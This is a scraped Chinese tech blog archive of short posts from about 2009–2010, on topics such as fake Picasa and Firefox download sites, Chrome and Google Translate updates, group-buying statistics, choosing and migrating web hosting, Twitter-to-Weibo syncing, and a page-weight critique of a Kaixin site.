如果大家想要下载Picasa和Firefox,那一定要小心,千万不要从第三方网站上面下载,比如用户在Google搜索“picasa3”,排在前面的就是一个欺诈网站,搜索Firefox也一样能发现不少欺诈网站,诱骗用户下载恶意程序。
这些人当初为了欺诈Google进行骗钱,做个那么多针对Picasa和Firefox的垃圾站,现在终于把Google推介搞死了,他们竟然在上面放木马继续坑害用户,Google竟然没有在搜索结果标示恶意网站实在令人诧异。
即使Google未来将其标记了,也还有百度,而百度是国内使用量最大的搜索引擎,有不少低端网民都使用百度,并且根本不会判断哪些是恶意网站,因此希望百度能拿出自己的社会责任感,对于搜索结果中包含木马的网站也像Google那样标识恶意网站,这样才能彻底切断这些木马病毒的流量来源。
目前这些恶意网站的木马病毒做的还比较低级,容易判断,大多数都是用一个不相关的EXE文件名,大小也不对,有经验的网民一眼就可以看出这是赝品,不过如果其再多做一些伪装的话,那样就难以判断了。
建议下载Picasa和Firefox或者其他应用软件,都直接到官方网站或者大型下载网站下载,切勿到一些来历不明的网站下载,搜索引擎有时候也是靠不住的。
2013年3月5日星期二
Google Chrome的Linux版和Mac版发布
据Google Chrome官方博客报道,Mac和Linux用户终于可以使用到Google Chrome浏览器。Google Chrome for Mac目前尚处于Beta测试阶段,因此Mac用户仍然需要谨慎使用。
Chrome4.0 Beta版充分地满足了需要自定义浏览器外观的用户。Mac和Linux版Chrome的支持中心与Windows版完全相同。但是,Chrome for Mac把工具栏按钮移到了浏览器的顶部。
Google现在不仅要向Windows客户端定期发布浏览器更新,而且要向Mac和Linux平台发布更新。Chrome4.0有插件支持功能,该功能与Firefox浏览器的插件功能相似。
Windows和Linux版Chrome的插件中心目前已经开放,用户可以下载到300多个Chrome插件。Chrome for Mac的插件功能目前尚处于早期测试阶段。
谷歌翻译支持中文发音
据Google官方博客报道,谷歌翻译(Google Translate)已经添加了多种语言的发音功能,其中包含中国普通话发音。
之前,Google Translate已经支持英文的“文本转换为语音”功能,随后几个月增加了法语,意大利语,德语,印地文和西班牙文等语言,现在又增加了中文普通话发音。
现在,你使用谷歌翻译将信息翻译为中文的时候,就可以通过点击翻译界面旁边的扬声器图标,来收听中文普通话的发音,类似下面。
具体的发音质量,根据我的测试,中文发音还不算完美,与英文发音有很大区别。
访问谷歌翻译:Google Translate
2010年国内团购网站报告
如果有人在问目前国内网络购物市场最火爆的话题是什么?凡是回答“淘宝”或“秒杀”的,统统拖出去,不解释——显然是“团购”啊,这词在今年的网购市场上咸鱼翻生,概念也有了新的进化,不再是几十个网友在某小区论坛里集体报名代购某地的红枣,而是特指沿袭美国Groupon.com网站的营销方式,在有限的时间里(通常是24小时或2-3天内)推出一个只有原价两折至五折的线下商家活动,通过“名额有限抢完即止”和“每天来看团购都不同”的特色,牢牢抓住了网民的眼球和访问黏度。
据说团购网站已有400多家,甚至比这个还要多。只不过能稳定下来存活期超过一个月并且天天有新料卖的屈指可数,大部分则是生生死死起起落落。这也让我彻底放弃了做全体团购网站调查统计的可能,本文也只能叫做“不完全统计报告”了。既然是一份统计报告,还是需要先把调查方法讲清楚:观察了6月29日当天团800这个团购所收录的团购网站,统计各城市相关的活动数量,你会发现北京是620条,远远超过其它城市,甚至排名第二的上海也只有北京的四分之一。所以我们本次的统计不妨把目标就锁定在北京地区的团购交易内,相信也非常具备统计价值了。
接下来的问题是,即便针对北京地区的团购网站来统计,那也是不计其数……好在“长尾效应”再次得到了验证——实际上在北京地区,无论是从团购活动的参与人数或者是成交金额来看,大部分都集中在前19家网站内,它们是(排名不分先后):美团网、拉手网、找折网、爱帮团、Yoka优享网、喜团、窝窝团、团宝、糯米网、满座、乐拼、酷团、可可团、饭统饭团、Like团(前叫橘子团最近刚改名)、F团爱赴团、58同城、36团、24券。为了延续本报告的“不完全统计”精神,我们不妨就以19家团购网站组成一个panel(观察组),从各家网站公开的历史团购信息中分析比对整理,看看从中能挖掘出什么有趣的信息。
发现一:团购网站1月始发,6月激增
大家都以为今年国内团购网始于3月份饭否创始人王兴再启动的美团,而实际上,如下图所示,根据满座网的公开信息,它的团购活动在1月25日和2月3日分别举行了一次,从而成为这19家网站中最先启动团购活动的一家。有人会问:嗯,可这又有什么意义呢?问的好,这件事最大的意义,就是更正大家对美团第一枪的错误印象,谢谢。
言归正传,这条活动量增长曲线在3-5月份基本保持了同一斜率,而到了6月份突然暴增至399。有人又会问:可这又有什么意义呢?这个的意思是说如果你用399/19,平均每家网站每个月要发布21条信息,正好也是6月工作日的数量。也就是说,虽然有的网站一天发布了2-3条团购活动,也有网站隔几天才发一条,但平均下来差不多是遵守了一般的团购发布规律——“工作日发布,周末休息”。
发现二:7天拿下上半年收入总冠军,糯米网与SNS的逆袭
下面这张表是最带劲的一张,因为有真金白银的钱数哦。这可不是笔者瞎写的,每个月的金额都来自于各家网站历史团购信息里的记录,当我们把每天的(成交人数*活动单笔现价)全部加总后,就获得了当月的现金销售额。理论上,这些钱都是通过支付宝等支付手段实时支付了的,所以这份统计答卷是具备含金量的,如果说单纯的活动人数只是捧个人气的话,那么看看这张表,谁最牛就不言而喻了。(选择使用公开数据的好处是避免主观臆断,但仍然不能避免网站调整数据,在本次统计中遭遇一些网站7月初还在悄悄修正之前数据的现象,甚至有从历史记录中拿掉某天交易的情况发生。没有绝对的客观,我们只能假定大部分团购网站自行公开的数据是真实可信的来做比较了。)
客观的说,美团的运营和商家活动挑选都更为规范,“出名要趁早”也注定了它一路跑来的喝彩和用户青睐。可以看到美团4月份的交易额是3月份的4倍还多,可见那两个月是团购网站们的黄金时间。而到了5月份后,随着山寨山寨版的快速繁殖,美团的销售额增长速度放缓。
7天可以做很多事,玉兰油可以让你变得更年轻,而人人网旗下的团购网站糯米网在上半场哨声吹响前的最后几分钟里,改写了整个团购市场的格局。6月23日第一天开局就以“40元双人暑期超值尽享!原价176元成龙耀莱国际影城套餐(电影票2张+可乐2杯+进口爆米花1份+哈根达斯冰激凌球1个)”赚来15万人的购买,创下了国内团购历史上的奇迹新高。与其说是成龙的品牌魅力,倒不如感叹人人网这样的SNS社区在影响群体网民购买行为的威力是多么令人发指。曾经的校内创始人王兴,不知道在团购市场中再遇“老友”陈一舟,是何感想?
有人悄悄的跟我说,王兴的美团在未来的几个月内,还会遇上张朝阳、马化腾。在这里,我只想告诉他,这事需要你悄悄说吗?从国内的博客市场、SNS市场、微博市场上“小网站铺路大网站碾过”的发展规律来看,这简直是一定的啊,你懂的。
发现三:典型团购情况,原价413元现价仅售89元,1200人三折疯抢中
这么多条团购活动,能否抽象的描述一下?好吧,当我们把19家团购网站2010年上半年的867条团购信息全部排在一起平均值统计后,可以用下面这张模仿团购网站的典型价格标签图来讲述我们的结论。
平均来看,一个团购活动大概会有1200人参与,原价大致会定在413元左右,而本次活动的现价只需89元。平均折扣大概是31%,有人质疑说89/413不是31%啊,没错,因为平均折扣的计算方法是把各项活动的折扣去平均,而不是用平均单价/平均原价!(好好想想死去的八戒10天前所说的话吧!)
在本文的结尾,不能免俗的列一下这19家里的TOP 10,希望对大家选择团购网站有一定的帮助。本不完全统计报告的第一部分先到这里,其实通过整整5天的数据分析还有很多有趣的发现,比如从团购活动的分类可以看出团购爱好者们对什么价位的美食优惠最有爱,而团购网站们又以团购的名义做了多少种变体的促销。
来源:团800投稿,官方博客链接。
虚拟主机网站安全迁移技巧
选择物美价廉的虚拟主机是一门学问,在不同的虚拟主机上选择最佳的主机也是一项痛苦的过程,由于不同网站租用的虚拟主机或者服务器性能各不相同,因此会遇到将某个网站从一个主机上迁移到另外一个主机上,今天我介绍一下安全迁移的技巧,以避免网站因为迁移而造成不必要的损失。
1、迁移新主机的检测
通常情况下,应该先测试新主机的IP地址是否是安全的,检测其是否被列入SPAM名单,是否被搜索引擎屏蔽,上面是否有其他非法网站等,通过电信、网通、国外等多个不同线路是否能正常访问该主机IP地址,不要往不安全不可靠的主机IP上迁移网站。
2、迁移计划的制定
制定一个详细的有步骤的网站迁移计划,将原有网站内容保存至少半个月的时间(但不一定需要更新),最好能保留一个月以上的时间,因为很多搜索引擎会缓存DNS,这样可保证搜索引擎使用原来的IP地址仍然可以访问到内容。如果你不慎将原有网站内容删除,将导致返回404错误给搜索引擎,带来不必要的损失。
3、迁移工作的实施
保持原有网站不变,将原有网站的内容、数据库、服务器设置等都先复制到新的主机上,通过修改本地HOSTS文件(域名指定为新的IP地址)来测试访问新的主机是否工作正常,如果测试新主机的一切都正常,则可以进行域名解析的修改。
4、域名解析的修改
尽量避免通过修改DNS(Domain Name Server)服务器地址来迁移网站,最好使用修改A记录的方式迁移,修改DNS需要一至两天后解析生效,中间还可能会中断。修改A记录则可靠一些。
至此,整个网站的迁移工作就完成了,切记一定要将原有网站的内容保存在原有的IP地址上一段时间,我曾经测试过,有些搜索引擎的爬虫在切换IP后半个月还会访问旧的IP地址。
国外虚拟主机选购指南
国外的虚拟主机和国内的相比有不少的优点,例如不用去备案,价格相对低廉,稳定性也好,虽然从国内访问速度稍微慢一些,但的确是一个低成本创建一个网站的好方案。国外的空间基本上是基于Linux+Apache+MySQL+Php的,由于PHP已经事实上统治了网站设计语言的标准,因此国内人也基本可以放弃继续使用ASP了。
然而,国外的虚拟主机依然是鱼龙混杂,甚至有一些很著名的虚拟主机供应商也在搞猫腻,我购买国外虚拟主机已经有很长一段时间了,我的月光博客英文网站在使用国外虚拟主机的这段时间也遇到了种种以前没想到的问题,因此我就再次总结一些选购和识别国外优秀虚拟主机的方法,供大家参考。
虚拟主机的原理,就是把一台真正的主机分成许多“ 虚拟”的主机,它们之间完全独立,使得多个用户共享一台真实主机的资源,节省用户的硬件费用和流量费用。通常虚拟主机的价格都是每月5至10美元左右,非常低廉,虚拟主机商为了从有限的服务器和网络资源中获得最大的利益,那么就必须要侵害了用户的利益,过度销售(Overselling)虚拟主机,因此,只有识别出过度销售(Overselling)的虚拟主机,才能选择到一个稳定而优秀的虚拟主机。
如何识别出过度销售(Overselling)的虚拟主机,我这里总结了几个要点:
容量与流量参数的诡计
绝大多Overselling的虚拟主机商都在玩一个数字游戏,每月不到10美元,就可以购买超大容量和流量的主机,其容量和流量参数往往比租用一台服务器的流量还要大,举个例子,使用独立服务器的月光博客目前的月流量只有450G,而几乎所有Overselling的虚拟主机都声称能提供每月超过1000G的流量,当然这个承诺是永远无法兑现的,如果你真有一个每月1000G流量的网站,那么绝对不能考虑这些Overselling的虚拟主机,因为在你还没有使用到百分之一左右的流量时,通常这些虚拟主机商都会以使用了过多资源为由而终止你的服务,受骗的用户实际上并没有认识到巨大的空间和流量与使用的CPU和内存资源是两回事,如果你使用了很多的流量,主机商不会以使用过多流量而是以使用超额CPU和内存资源为由终止服务。
按年支付的风险
几乎所有的Overselling的虚拟主机的付款方式都是以按年支付为准则的。要么他们只支持按年付款,不支持按月付款,或者按月付款的价格和按年付款的价格相差巨大,迫使用户选择按年支付。为什么这些主机商要这么做呢?因为他们的限制CPU和内存的方式肯定会引起用户对购买的虚拟主机不满意,用户肯定会终止付费重新选择主机商。如果按月支付,用户发现这个主机速度很慢或者服务不好,那下个月就可以中止支付而去选择其他主机,对于个人来说风险较小而没有什么损失。如果是按年付费通常将会得不到退款,损失了一年的费用。虚拟主机商通过这种方法迫使用户多支出了一笔费用,赚取了黑心钱。而通常不搞Overselling的正规而自信的主机商都乐于提供按月支付方式,而且按月支付的价格和按年支付不会相差很大。
推荐回扣奖励
搞Overselling的虚拟主机为了扩大用户群,会采用回扣奖励或现金返还的形式进行促销,即用户推荐一个新的主机注册用户,推荐人可以得到金额奖励或者回扣,类似于传销的形式。搞这类活动的基本上都属于Overselling的虚拟主机。他们确实通过这种形式获得了大量用户,但其主机质量却会随着用户的增加而降低。
可绑定的域名数量
搞Overselling的虚拟主机提供几乎不受限制的域名绑定,一个用户可以在虚拟主机上绑定无数的网站,很多人喜欢这种功能。但是我们要知道,一台服务器的资源是有限的,绑定的网站越多,耗费的资源就越大,这样的结果是网站的响应速度和稳定性就降低,经常出现500错误,例如我购买的某个虚拟主机,上面竟然绑定了一千多个FTP用户,这样的虚拟主机能好用吗?因此,正规的虚拟主机商提供1、2个域名绑定其实就能保证大多数用户的利益了。
以上就是我总结的一些识别出过度销售(Overselling)的虚拟主机的技巧,如果你使用的WordPress或者论坛有可能达到每天1万IP访问,那么最好不要选择Overseelling的虚拟主机,因为他们的CPU限制会导致网站访问极不稳定。当然,如果你有很多小网站,或者网站全部是HTML格式,很少使用PHP和MySQL,那也可以选择Overselling的虚拟主机,因为纯HTML的页面消耗CPU很小,不会产生很大负荷。否则的话,最好选择限制流量而非限制CPU的虚拟主机。
我建议的非Overselling的虚拟主机,通常价格为5到10美元,限制流量为每月100G以下,绑定1-2个域名。这种参数的虚拟主机通常是不会限制CPU的,适合那些每天访问量超过1万IP的动态PHP网站的选择。
2013年3月3日星期日
FriendFeed推出中文版
今天收到一封杨雨宁发来的邮件,说FriendFeed今天推出六种新的语言界面。FriendFeed用户现在可以从英语、法语、德语、西班牙语、俄语、日语和简体中文之中选择界面语言。
对于中文用户的特别支持,FriendFeed还开始支持百度空间的博客了,使用百度空间的用户现在可以在FriendFeed中增加自己的博客了。
我的FriendFeed地址是: http://friendfeed.com/williamlong
FriendFeed网站让人们了解朋友和家人分享的网页、图片、视频和音乐的最新动态。网站的目标是,借助用户现有的社会关系,让网络上的内容更有用,更容易为人们所发现。FriendFeed用户获得他们认识的人所分享的新闻报道、家人照片、有趣链接和视频等各式内容的自定制feed源。
为了便于分享,FriendFeed自动从互联网上50多个网站导入共享的项目,其中包括Facebook、YouTube和Flickr等热门网站。用户无需下载或安装软件;另外,用户可以直接通过网站、电子邮件和即时消息发布消息、链接和图片。
Bloglines真的关闭了
很早以前就有传闻,这个老牌的RSS阅读器即将关闭,这次终于成为现实了,在Bloglines的首页上发布说明,将于10月1日关闭该服务。
Bloglines曾经有过自己的辉煌,一度曾经是在线阅读器的霸主,但是自从Google Reader推出后,Bloglines的新增用户就停滞不前直至倒退,而Bloglines自己也不争气,几年时间几乎没有任何更新,RSS的抓取也极不稳定,导致用户大量流失。
与此同时,Facebook等社交网站和Twitter等微博网站的兴起也对RSS阅读器的发展产生了一定的影响,导致其使用量大幅减少。根据美国互联网流量监测机构comScore的数据,Bloglines今年8月的独立用户访问量为46.8万。
美国市场研究公司Altimeter Group的分析师杰雷米。欧阳(Jeremiah Owyang)说:“Bloglines等传统RSS阅读器消失的原因在于Twitter和Facebook成为新的feed阅读渠道。传统feed阅读器将继续下滑。”
因此,Ask.com终于在其博客上宣布关闭该公司旗下的RSS阅读器Bloglines,并且帮助用户将feed导出到其他RSS阅读器中。Ask.com于2005年收购了Bloglines,但之后几年却没有对该服务投入太多精力,而且很少进行更新,期间谷歌阅读器(Google Reader)逐渐成长为该领域的领导者。
Twitter同步到新浪微博和开心网
新浪微博和开心网等SNS虽然很流行,但Twitter的用户大多对其不感冒,不过即使如此,Twitter用户可能也会需要一个功能,就是能自动将自己的Twitter信息同步到新浪微博、开心网、人人网等国内SNS网站。以前我曾经介绍的一个同步方案因为嘀咕的维护而无法使用,这里我就介绍一下最新的同步方法。
首先是处理Twitter的Feed功能,主要功能包括删除feed中的username,过滤掉@回复的信息等,我这里提供了两个版本,一个是PHP的,一个是Python的,Python版可以安装到GAE上。
接着,翻墙登录TwitterFeed,在里面设置RSS Feed为上面做好的过滤Feed的网址,目标服务可以选择Ping.FM或HelloTXT这两者之一,设置时候需要API Key,可以去Ping.FM或HelloTXT网站上获取。
之后,翻墙登录Ping.FM或HelloTXT,在里面设置一个Custom URL,用来实现自定义同步服务,同步信息到火兔,具体代码参见这里。
最后,使用原先嘀咕的帐号登录火兔后,在嘀神服务中,绑定新浪微博、开心网、人人网等,这样就可以实现从Twitter同步信息到新浪微博和开心网。
整个同步的流程图如下: twitter -> appspot -> twitterfeed -> ping.fm -> customurl -> huotu -> 新浪微博。
这种同步方式,虽然设置的时候要翻墙设置好几个服务,但设置好了以后,同步功能完全正常,可以方便的实现自动将Twitter的信息同步到国内网站,其缺点也是有的,就是同步不是即时的,有大约一小时左右的时差,这个时差是由TwitterFeed引起的,另外使用者还需要有一个支持PHP的虚拟主机。
新浪微博和Twitter的区别
著名的微博客系统Twitter在国际上虽然非常流行,但由于一些众所周知的原因,中国网民使用本地化的微博客更多一些,以前流行的饭否“被维护”了以后,现在新浪微博势头正旺。这里我就针对Twitter和新浪微博的功能进行一些比较。
注册用户
新浪微博目前为内测阶段,只有邀请才能注册,虽然新浪没有透露目前的微博用户数,但是从新浪微博的“排行榜”来分析,注册用户数大约在数十万数量级;Twitter目前注册用户约2000万左右,大部分是美国用户。
界面比较
新浪的界面是中文,Twitter的界面是英文,虽然两者都具有“个性模版”功能,但功能上有区别,新浪微博无法自定义背景图片;Twitter可以完全自定义背景以及颜色。
评论模式
新浪微博的评论有两个选项,可以直接在对方信息下评论,勾选“同时发一条微博”也可将该评论发布到自己的微博上,视觉显示类似Facebook的评论模式;Twitter的评论是直接在自己的微博上发布,在对方的timeline中看不到,相比来说,新浪微博的评论模式更为友好一些。
转发模式
新浪微博的转发模式,可以附带140个字数,转发后会发布到自己的微博,如果转发勾选“同时作为给关注某某的评论发布”,则还能使其以评论的方式发布到对方的信息里;Twitter目前正在添加转发功能(RT/Retweet),官方的RT不能附带自己的内容,但可以进行转发统计,非官方的RT可以附带内容,但包含原文在内不能超过140各字,且不能统计,相比来说,新浪微博的转发内容更多、更灵活一些。
好友列表
新浪微博没有好友列表功能,不能对好友进行分类管理;Twitter具有很强的list功能,不仅可以对自己的好友进行分类,还可以对任意用户进行分类,分类列表还可以单独订阅。
互联互通
新浪微博和新浪的用户系统集成,但没有和其他网站进行集成;Twitter可以和FriendFeed、Facebook、LinkedIn等系统整合集成,实现了完全双向的互联互通功能。
开放性
新浪微博目前是一个完全封闭的微博客网站,不支持API,不支持RSS,不支持电脑客户端,不支持手机客户端,总而言之,几乎什么都不支持;Twitter是一个几乎完全开放的微博客服务,除了注册以外,几乎所有的功能都提供API支持,有无数的客户端软件,支持RSS,大量用户使用非官方的客户端更新Twitter,用户可以深刻体会到,Twitter不是一个网站,而是一个服务。
审查机制
新浪微博具有审查机制,用户发布的信息会被监控,“有害信息”会被删除,这也是新浪借鉴互联网先驱们的经验教训,以前国内出现过很多微博客平台,但都因为无法解决信息发布的监控问题,而被迫关停了;Twitter通常不会审查用户的信息,但对于散播广告的用户会进行删除。
总之目前的新浪微博还是一个较为封闭的微博客网站,但用户的信息交互设计有不少特色,虽然人工审查会吓走一些用户到Twitter上,但新浪强大的运营团队依然有可能将其发展成为国内微博客的佼佼者。
最后做个广告,我的新浪微博是 http://t.sina.com.cn/williamlong ,我的Twitter是 http://twitter.com/williamlong ,欢迎添加我的关注和我交流。
Twitter实时同步到Ping.fm和Hellotxt
我很早就开始使用Ping.fm和Hellotxt的同步功能,这两个服务都是微博客的分发平台,用户通过将自己的不同的微博客账号或者社会化网络帐号绑定在Ping.FM和HelloTXT上,便可以通过这个平台同步发布信息到各类微博客上和社交网络上。
不过,我在使用这两个服务的时候产生了一些困惑,Ping.fm和Hellotxt的本质在于平台化,将自己当做一个发布平台,可以将信息同步出去,但这并不是真正的社会化网络设计,因为用户只能发布,无法得到反馈,信息交流也不方便,是一个典型的单向信息流模式。
因此,我认为真正的社会化网络传播模式应该是,将信息从Twitter传送到Ping.fm或Hellotxt,然后再由Ping.fm和Hellotxt同步信息出去,而用户的的反馈可以在Twitter上实时获得。
但是由于利益的关系,Ping.fm和Hellotxt都不提供接收Twitter信息的功能,只提供发布信息到Twitter的功能,因此,我就自己动手,将前段日子写的那个基于GAE的Twitter同步程序增加支持从Twitter同步信息到Ping.fm和Hellotxt的功能,也就是说,在Twitter发布的信息,可以自动同步到Ping.fm和Hellotxt,然后再由这两个服务传播到更多的社会化网络中。
整个系统的流程图如下所示:
这个程序的使用方法和微博客同步有些不同,Ping.fm和Hellotxt的架构和功能类似,其API调用并不是使用用户名和密码调用,而是使用developer API key和user application key来实现认证,不会出现用户名和密码,因此也较为安全,这里介绍一下各个key的获取方法。
Ping.fm的user application key可以在这个地址 http://ping.fm/key/ 获取。
Ping.fm的API Key可以在这里 http://ping.fm/developers/request/ 创建。
Hellotxt的user_key在这里获取 http://hellotxt.com/settings/api 获取。
Hellotxt的application key在这里 http://hellotxt.com/api/dev 创建。
每个人的key都不同,自己的key用来更新自己的帐号,通常自己使用的话直接申请即可得到。
Ping.fm和Hellotxt两者的功能重合度相当高,不必两个服务都使用,只要使用其中一个服务即可,Ping.fm支持同步37个服务,Hellotxt支持59项服务,不过Hellotxt支持的很多服务同步都有些问题,而Ping.fm支持各个IM的状态更新是Hellotxt所没有的。
应用的安装部署方法
下载方法,使用TortoiseSVN检出这个SVN地址,然后,编辑app.yaml,修改为自己的appspot应用名,接着,修改twitter.py文件的最后一行,将自己的Twitter用户名填入,修改 ret = send_pingfm_msgs("api_key","user_app_key",text) 或 ret = send_hellotxt_msgs("user_key","app_key",text) 里的key值,不需要同步的服务请使用#号注释掉,cron.yaml文件里是计划任务设置,然后就可以按照此文的方法进行发布,执行 appcfg.py update 目录名,使用Gmail帐号和密码,就可以发布了。
发布之后,GAE就可以定时执行twitter.py程序,由于定时执行可以设置最短为1分钟,因此同步速度很快,基本可以实现即时自动同步的效果。
注意事项
Ping.fm和Hellotxt需要翻墙访问。使用前需要先申请key。
如果在Ping.fm或Hellotxt中绑定了Twitter帐号,需要将Ping.fm和Hellotxt中关联的Twitter帐号删除,否则会造成死循环。
Google意大利街景车拍下妓女拉客
Google前些日子开放了意大利的街景地图,不久,就有人在上面发现了有趣的东西。
位于意大利罗马市的北郊一条名叫Via Salaria的街道上,某人开着公司的面包车(网站地址在车后),停在路边,和一个衣着暴露的女子讨价还价,很像是嫖客和妓女进行色情交易,不幸的是,这幅画面被Google的街景摄像头拍摄到了。
据有关新闻报导,Salaria街是当地非常有名的妓女街,妓女们经常在大街上拉客,罗马市长阿雷曼诺曾经宣布,政府将严厉打击那些穿着“不体面和不恰当服装”的妓女。市长办公室颁布的一条法令称,这些以各种方式暴露身体的妓女,使男性司机“精力不集中”。该法令指出,“这种极其鲁莽的行为违反了交通规则,也是对道路安全的严重破坏”。
如其所说,使用Google街景地图,沿着Salaria这条街走,还真的可以看到不少穿着类似暴露服装的女子在路边行走的画面。
另外,在这条街道上,街景摄像头拍摄到这样的画面:一个司机把车停在旁边,然后一个人在道路边旁若无人的小便,不幸被Google的摄像头偷拍了。本以为这种事情只有中国才会发生,没想到意大利罗马人也是这种素质,真让人大跌眼镜。
Google Maps下的猪流感病毒传播地图
据gizmodo报道,近期墨西哥、美国等地接连爆发新型猪流感病毒疫情,墨西哥疑似病例达4000余人,可能已有149人死于猪流感,美国确认有44人感染,欧洲多国已现疑似病例。
现在,我们可以通过Google Maps(谷歌地图)将各地区病情情况进行追踪:其中粉红色的地方有疑似病例,紫色的地方确定有人感染H1N1型猪流感,黄色地方表示已经排除的病例,没有点的粉红色表示已经确认死亡病例。
世界卫生组织已经在27日晚将流感大流行警告级别从目前的3级提高到4级。世卫组织的流感大流行警告共分6个级别,“第3级”意味着一种新的亚型流感病毒正在造成人类感染,但还没有造成到在人际间有效且持续地传播扩散;而“第4级”意味着一种新病毒在人际间传播,可以引起“群体性”暴发。
点击查看H1N1猪流感Google地图:
1、2009 Swine Flu (H1N1) Outbreak Map
背景知识:H1N1猪流感病毒特性
此次猪流感病毒代号为H1N1亚型新毒株,包含人流感病毒、北美禽流感病毒和北美、欧、亚猪流感病毒的基因片段。
感染猪流感病毒的患者症状类似患季节性流感。美国病例主要表现为突然发烧、咳嗽、肌肉痛和疲倦,其中一些患者还出现腹泻和呕吐症状。墨西哥病例还出现眼睛发红、头痛和流鼻涕等症状。
世界卫生组织的专家警告称,此次流感的不同之处就在于患者多为身体强壮的年轻人,而非一般流感容易感染到的老人和儿童,而这一点正是会造成大量死亡的严重流感的特征之一。
据悉,目前医学界还没有研究出任何可以抵御猪流感的疫苗,而那些已经投入使用的流感疫苗是否能够为人体提供足够的保护目前也不得而知。
谷歌地图疑遭阉割
随着国家测绘局今年开始加强对中国互联网地图服务的管理,很多网友开始发现,原先非常好用的谷歌地图服务,似乎最近变得不太好用了,据推测,是否因为谷歌没有获得网络地图牌照而被迫删除了部分城市的地图。
中国的部分城市的谷歌地图信息正在消失,之前存在的地图现在没有了,例如深圳市的罗湖区文锦渡大片地区,南山区的蛇口大片地区,盐田区的南澳大片地图的地图信息都没有了,疑似谷歌地图正在因为某些原因屏蔽和删除一些地图信息。
中国的测绘局等部门曾经在很多个场合“暗示”谷歌地图泄漏了中国军事机密,而很多不明真相的网友还附和测绘局的说法,现在,居住在罗湖区文锦渡、南山区蛇口等地区的网民不知道该怎么想,当自己居住地的地图消失后,通常会给自己的出行、公交线路查询带来很大的不便。而在深圳市区消失的这些地图,莫非就是传说中的军事保密区域?
罗湖区文锦渡的谷歌地图,消失的地图恰好位于“罗湖区政府”附近
早先的6月28日,国家测绘局在其官方网站上宣布,23家企业已经通过了在线地图资质验证,这23家企业中包括百度、搜狗、MapABC等,但不包括谷歌中国和腾讯。
谷歌在中国的合作伙伴是MapABC,谷歌地图的中国地图信息均来自MapABC,我们使用MapABC查询深圳罗湖区的相同地点,看到地图可以正常显示,并没有屏蔽的信息。
谷歌地图是最受欢迎的在线地图服务之一,在智能手机上的表现尤其出色,用户可以在不同的终端访问谷歌地图,谷歌地图提供API(应用编程接口),因此大量第三方网站可以通过编程将谷歌地图嵌入到自己的应用中,从而使得谷歌地图在全球范围内都非常流行。
腾讯在地图领域相对落后于竞争对手,但也加紧招募人才,并已经推出了腾讯搜搜地图的测试版。面对国内众多的竞争对手,如果谷歌地图的显示出现异常的话,那么有可能谷歌地图的用户会转移到其竞争对手的地图服务中。
更新:地图数据丢失的问题在珠海拱北也有,据Google员工回复,“数据缺失问题,由于地图数据来自于提供商,需要较长周期来更新。”
2013年3月2日星期六
网站技术分析报告之——开心网
读者投稿:一直在研究互联网技术,经常访问这样那样的网站,突发奇想,为什么我们不去看看这些网站的技术架构是怎么样的呢?研究一下源代码?于是便有了这个系列,首先找谁呢?还是找山寨版的开心网开刀吧,这个开心网,不是那个开心网,呵呵。
坦白说,我不太想注册,也不想研究太多太多,一般来说,一个网站最重要的是首页,Ok,那我们就从首页开始吧。
本系列文章仅仅是个人研究发布,仅供参考。
分析工具:各种浏览器,firebug(一个基于firefox的插件)
开心网首页是一个简单的登陆页,居然做到了385.2KB之大,像开心网这么大的流量,每多1kb就意味着每天N多的钱哪。我没有找到官方的pv 或独立Ip的数据,根据alexa的数据参考一下吧,估计日均独立IP为528,000,我们估计按每独立IP访问一次登陆吧,实际上可能少一些,因为很多用户可能直接在首页上登陆了(alexa的数据也不是那么可靠,供参考吧)。
开心网的网页每增加1k,我们需要多少带宽?算一下,我们需要528,000/1024=515MB/天的带宽,然后我们平均一下,按一天24小时用户访问很平均来计算(实际上不可能,一般峰值访问会是平均值的一倍以上),每秒需要消耗带宽是528000 / (24小时 * 60分钟 * 60秒)=6Kb,考虑到峰值,估计要到12k以上。
看官,像开心网这么简单的登陆,完全可以控制在100k以内的大小,为什么要这么多呢,一会儿看网页的分析就可以知道了。这是什么概念?385-100=285k,再算出带宽得出:285k * 12k / 1024 = 3.3M.乖乖,开心网每天需要添加3.3M的独享带宽。3.3M的带宽会是多少钱呢?我们就以中档的机房来举例,北京中档的3M独立带宽,怎么也得3-5万块吧,再加上CDN的带宽,估计开心网每年需要为此增加5-8万的费用。
分析一下开心网存在的问题:
1. Javascript文件直接写在了网页当中
开心网的登陆页有大量的javascript的代码,这样的代码一方面不利于维护,另一方面,也不利用用户加载页面。大致计算了一下,开心网登陆页一个有180余行的javascript代码,而总代码仅在336行,也就是说代码中的javascript代码占了1/2 强。
2. 网页没有开启gzip
根据文件头返回的信息可以看到,开心网应该在linux上搭建了nginx ,添加gzip应该不会是很难的事吧?而且像html及静态js/css这些文件,gzip后起码可以减少50%的传输量,当是这一项,就可以每年省下上百万的费用。
当然有人会反对,认为gzip会加重服务器的压力,并且客户端解压的时间与减小文件大小带来的传输速度不会有太多好处。但我认为,对于静态文件来说,可以放到独立的服务器,这个服务器可以把文件压缩后放到缓存中,这样不用去读IO,响应速度会提高。同时,虽然现在用户的带宽都已经是512k的 adsl以上了,但是为什么我不可以让用户更快的看到我们的网页呢?退一万步说,用户真的在乎这个快几秒的,那么我们为什么不可以减小带宽的压力以节省成本呢?如果把节省下的这些钱去奖励员工,没准他们可以给我带来更多的惊喜呢。
3. Javascript没有做任何处理
开心网的 javascript可真有意思,他们的开发人员代码质量还不错,起码注释写得还不错,可是问题是,你需要把这些注释都发到客户端么,难道开心网想教我们怎么写javascript代码?这样的代码发到客户端,既占带宽又会泄密网站的代码。
开心网的核心javascript文件xn.core.js有105k,这么大的其中注释占了不少的代码,我尝试使用yahoo和google的压缩工具进行压缩,但因为代码中有错误无法完成,所以只好放弃。但我估计这个js,最基本的压缩去除空行和注释,可以减少1/5左右的大小,如果进行一些混淆的话,应该可以在40k左右,如果再gzip的话,应该就只有15k以内了。
4. 图片文件过大
登录页有一个157k的sys-bj2.jpeg文件,天啦,这么大的。我下载这张图片一看,发现这个图片实际是同几张图片组合的。他们的设计人员其实是想减少网页对服务器的请求数,所以把几个图片合并到一块。但是,他们这种做法是错误的。
我们要减少请求数,一般是把小图片,一般是几k的36 px* 36px以下的小图片合并,而不是把大图片也合并。因为小图片数量多,而大图的合并,也会增加图片的大小。我将这个图片用ps再优化一下,优化到 66k,也没发现明显的失真。所以我认为,就算是大图,也可以优化到80k以内,而不是如此157k大小的图片。
再多一句,这个图片总量才5个合并是完全没有必要的,并且图片最大的有600px*255px,而最小的只有10px*10px以下,这种合并没有任何益处,百害而无一益!
总结
